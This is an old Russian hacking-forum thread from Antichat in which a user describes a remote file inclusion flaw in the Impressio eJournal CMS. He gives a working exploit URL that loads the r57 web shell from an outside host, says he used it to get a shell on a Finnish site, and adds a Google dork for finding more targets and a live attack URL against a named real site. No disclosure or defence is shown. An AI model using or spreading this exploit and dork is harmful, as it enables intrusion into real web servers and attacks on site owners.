ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в Impressio eJournal
  #1  
Старый 11.03.2006, 23:48
Аватар для Mobile
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333

Репутация: 1564


Отправить сообщение для Mobile с помощью ICQ
По умолчанию Уязвимость в Impressio eJournal

В общем искал я недели 2 назад какую-то инфу в гугле, и случайно наткнулся на один финский сайт. В шапке сайта была надпись: “Warning: end(): Passed variable is not an array or object in /var/www/sasem-dev/project/class-1.24/common/interfaces/class.IBrowsing.php on line 21”
Казалось-бы нечего интересного, но тут я обратил внимание на адресную строку, она была такого вида:
site.net/…/index.php?action%5B%5D=IBrowsing::goOneFolderBack( 'browsingpage')
Тут я решил сформировать запрос такого типа:
site.net/…/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt')) Шелл успешно запустился, и я начал капаться в дебрях этого сайта…
Мне стало очень интересно, а не в движке-ли эта бага? Я полез на главную страницу в поисках улик. В крайнем правом углу красовалась надпись …Impressio eJournal, я решил в гугле вбить
Powered by Impressio eJournal. Он мне выплюнул несколько сайтов, с этим движком, кстате финских.
Так-же можно вбить в Гугле inurl:"index.php?action%5B%5D=IBrowsing::"
Интересно, что про багу в этом движке, да и вообще про движок в инете нечего нет.
Вот пример
http://www.etwinning.fi/index.php?action%5B%5D=IBrowsing::gotoFolder(inclu de%20('http://rst.void.ru/download/r57shell.txt'))

Последний раз редактировалось Mobile; 11.03.2006 в 23:52..
 
Ответить с цитированием

  #2  
Старый 12.03.2006, 01:27
Аватар для Mobile
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333

Репутация: 1564


Отправить сообщение для Mobile с помощью ICQ
По умолчанию

Ну как?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимость WMF- просто очередная недоработка программного кода Windows dinar_007 Мировые новости 0 19.01.2006 03:26
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости 0 02.10.2005 22:28
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов k00p3r Чужие Статьи 1 11.07.2005 19:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ